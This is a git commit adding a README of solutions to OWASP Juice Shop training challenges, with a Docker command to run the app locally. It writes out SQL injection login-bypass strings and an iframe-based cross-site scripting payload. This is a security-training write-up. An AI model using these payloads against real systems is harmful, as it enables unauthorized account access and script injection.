Add explanation about forged image

Solve XSS task
Add solutions for SQL Injection
2023-11-10 13:23:38 +01:00 · 2023-11-10 13:09:54 +01:00 · 2023-11-10 13:00:16 +01:00
1 changed files with 33 additions and 0 deletions
--- a/Juice/README.md
+++ b/Juice/README.md
@ -0,0 +1,33 @@
+# Let's Buy Some Juice
+## Booting Up Juice Shop
+```sh
+docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop
+```
+
+## SQL Injection
+### Login as Admin
+  1. Open `Account` => `Login`
+  2. Type `' OR TRUE; --` into `Email` and any password in `Password`
+
+Result:
+
+<!--- ToDo: Insert Picture -->
+
+### Login as Jim
+  1. Open `Account` => `Login`
+  2. Type `jim@juice-sh.op'; --`
+
+Result:
+
+<!--- ToDo: Insert Picture -->
+
+## Cross Site Scripting
+ 1. Open up the Search Box
+ 2. Type `<iframe src="javascript:alert('hello')">`
+
+<!--- ToDo: Insert Picture -->
+
+## Forged Picture
+This challenge is impossible due to the `/profile` page only reading the username from POST variables.
+
+POST variables cannot be set through links and thus can't be set in an `img`-tag's `src` either.
Author	SHA1	Message	Date
Manuel Thalmann	73881dc6ca	Add explanation about forged image	2023-11-10 13:23:38 +01:00
Manuel Thalmann	07d9514db3	Solve XSS task	2023-11-10 13:09:54 +01:00
Manuel Thalmann	c7093cd7a8	Add solutions for SQL Injection	2023-11-10 13:00:16 +01:00